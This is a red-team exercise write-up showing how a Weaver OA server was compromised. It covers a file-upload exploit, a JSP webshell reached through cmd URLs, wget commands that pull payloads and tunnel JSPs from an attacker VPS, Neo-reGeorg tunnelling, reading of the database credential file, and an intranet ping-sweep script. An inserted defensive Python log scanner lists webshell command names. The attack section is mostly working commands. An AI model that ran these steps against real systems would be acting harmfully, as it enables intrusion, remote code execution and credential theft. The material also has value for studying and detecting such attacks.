Notes from a real-world offensive and defensive exercise
0x01 Information collection
During the initial information gathering, the main site turned out to be very strictly protected: brute-force attempts were locked out and batch testing tools were banned, so it was very hard to make progress.
Subdomains were enumerated, and after visiting them one was found to be a business system whose IP geolocated overseas; it turned out that the company has overseas operations, and this was eventually identified as a relatively marginal asset. Visiting the system's homepage and testing the login box: capture the login request for testing, enter an arbitrary account and password, and a License submission page is shown. Testing the file upload function: the cookie header contains a field named ecology_JSession, which confirms the fingerprint as a Weaver (泛微) OA application.
0x02 Web entry point
Testing for vulnerabilities with a public Weaver OA EXP:
Tested the Weaver OA weaver.common.Ctrl arbitrary file upload vulnerability and uploaded a one-line JSP webshell.
Manually testing the one-line JSP at http://X.X.X.X/cloudstore/GyBtVQDJ.jsp?cmd=whoami showed that command execution works and that the target system is Linux.
Check whether the target machine has outbound network access: have the target ping my VPS, then listen on port 80 on the VPS and have the target connect to port 80. The target machine can reach my VPS.
0x03 Establishing a foothold
1. Try to manage the target with a webshell: generate a Behinder (冰蝎, "ice scorpion") JSP webshell and try to drop it on the target machine.
http://X.X.X.X/cloudstore/GyBtVQDJ.jsp?cmd=ping X.X.X.X -c 4
http://X.X.X.X/cloudstore/GyBtVQDJ.jsp?cmd=wget http://X.X.X.X
(1) Determine the absolute path of the website: the absolute path is /data/bdip/weaver/ecology/
(2) Start a temporary web service on the VPS to serve the webshell, and have the target machine execute the download command. Confirm that the Behinder webshell has landed under the website's absolute path on the target machine.
http://X.X.X.X/cloudstore/GyBtVQDJ.jsp?cmd=pwd
http://X.X.X.X/cloudstore/GyBtVQDJ.jsp?cmd=wget -P /data/bdip/weaver/ecology/ http://X.X.X.X/x.jsp
Connect to the webshell with Behinder; the connection succeeds:
2. Manage the target through an HTTP tunnel
(1) Use the Neo-reGeorg tool to generate the tunnel JSP: python3 neoreg.py generate -k xxxx
(2) Download the tunnel JSP to the target machine: confirm that the tunnel .jsp file has landed in the target's web root.
(3) Connect to the HTTP tunnel JSP from the VPS:
http://X.X.X.X/cloudstore/GyBtVQDJ.jsp?cmd=wget -P /data/bdip/weaver/ecology http://149.28.22.33/xx.jsp
python3 neoreg.py -u http://X.X.X.X/tunnel.jsp -k xxx -p 1001
(4) Verify access to the target's intranet through the proxychains proxy tool:
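A defender-side counterpart to the webshell traffic shown above, added here as an example and not part of the original writeup: it scans web-server access logs for requests to a .jsp file that carry a cmd query parameter and rates the command by whether it stages a payload or performs host reconnaissance. The log lines, IP addresses and JSP name are constructed placeholders.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in combined log format; the IPs, timestamps and the
# JSP name are placeholders for illustration, not indicators from any incident.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:12:00:01 +0000] "GET /login/Login.jsp HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:12:00:05 +0000] "GET /cloudstore/GyBtVQDJ.jsp?cmd=whoami HTTP/1.1" 200 23 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:12:00:07 +0000] "GET /cloudstore/GyBtVQDJ.jsp?cmd=id HTTP/1.1" 200 40 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:12:00:09 +0000] "GET /cloudstore/GyBtVQDJ.jsp?cmd=wget%20-P%20/data/bdip/weaver/ecology/%20http://198.51.100.9/x.jsp HTTP/1.1" 200 0 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:12:00:12 +0000] "GET /cloudstore/GyBtVQDJ.jsp?cmd=cat%20/data/bdip/weaver/ecology/WEB-INF/prop/weaver.properties HTTP/1.1" 200 812 "-" "Mozilla/5.0"
198.51.100.2 - - [10/Oct/2023:12:01:00 +0000] "GET /cloudstore/static/app.js HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Program names that, when passed to a webshell, indicate payload staging or
# host reconnaissance (the pattern seen in the writeup: ping, wget, cat ...).
HIGH_RISK_BINARIES = {"wget", "curl", "cat", "ping", "whoami", "chmod", "bash", "sh", "nc"}

def classify_request(line):
    """Return a finding dict for a webshell-style request, or None otherwise."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    # Only JSP endpoints that receive a 'cmd' query parameter are of interest.
    if not url.path.lower().endswith(".jsp"):
        return None
    cmd = parse_qs(url.query).get("cmd")  # parse_qs already percent-decodes
    if not cmd or not cmd[0].strip():
        return None
    command = cmd[0].strip()
    binary = command.split()[0].rsplit("/", 1)[-1]  # also handles /usr/bin/wget
    severity = "high" if binary in HIGH_RISK_BINARIES else "medium"
    return {"ip": m.group("ip"), "path": url.path, "command": command,
            "severity": severity, "status": m.group("status")}

def scan_log(text):
    """Scan a whole log and return findings in the order they appear."""
    return [f for f in (classify_request(ln) for ln in text.splitlines()) if f]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f'{finding["severity"]:6} {finding["ip"]} {finding["path"]} -> {finding["command"]}')
```

Pointing the same scan at the application server's own logs rather than a reverse proxy catches the case where the webshell is reached directly on the backend port.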
0x04 Information collection on the foothold machine
1. Look for the database configuration file used by the Weaver OA:
2. View the database connection configuration file: the database is MSSQL, and the database service is listening locally.
3. View the data in the database: obtain the sa user's password and connect to the database with Behinder; the data in the corresponding database can then be seen:
http://X.X.X.X/cloudstore/GyBtVQDJ.jsp?cmd=ls -lrth /data/bdip/weaver/ecology/WEB-INF/prop/weaver.properties
http://X.X.X.X/cloudstore/GyBtVQDJ.jsp?cmd=cat /data/bdip/weaver/ecology/WEB-INF/prop/weaver.properties
0x05 Intranet information collection
1. Check the IP address of the current machine and the hosts in the same network segment:
2. Detect live hosts in the current network segment. Because the socks5 proxy cannot carry ICMP ping traffic, prepare a ping.sh script on the VPS and temporarily start an HTTP service to serve it:
#!/bin/bash
# Sweep the /24 with two ICMP echo requests per host and report the result.
for i in {1..254}
do
  ping -c2 -i0.3 -W1 X.X.X.$i &>/dev/null
  if [ $? -eq 0 ]; then
    echo "X.X.X.$i is up"
  else
    echo "X.X.X.$i is down"
  fi
done
The target machine then downloads the ping.sh script to the /opt directory:
Give the ping.sh script execute permission:
Run the ping.sh script and write the probe results to a file. Looking at the scan results, apart from the foothold machine itself, only one other machine in the current segment is alive.
That surviving machine is most likely the gateway, and there are no other machines to move laterally to.
Checking the hosts file showed that this is a cloud host. End.
Posted by geo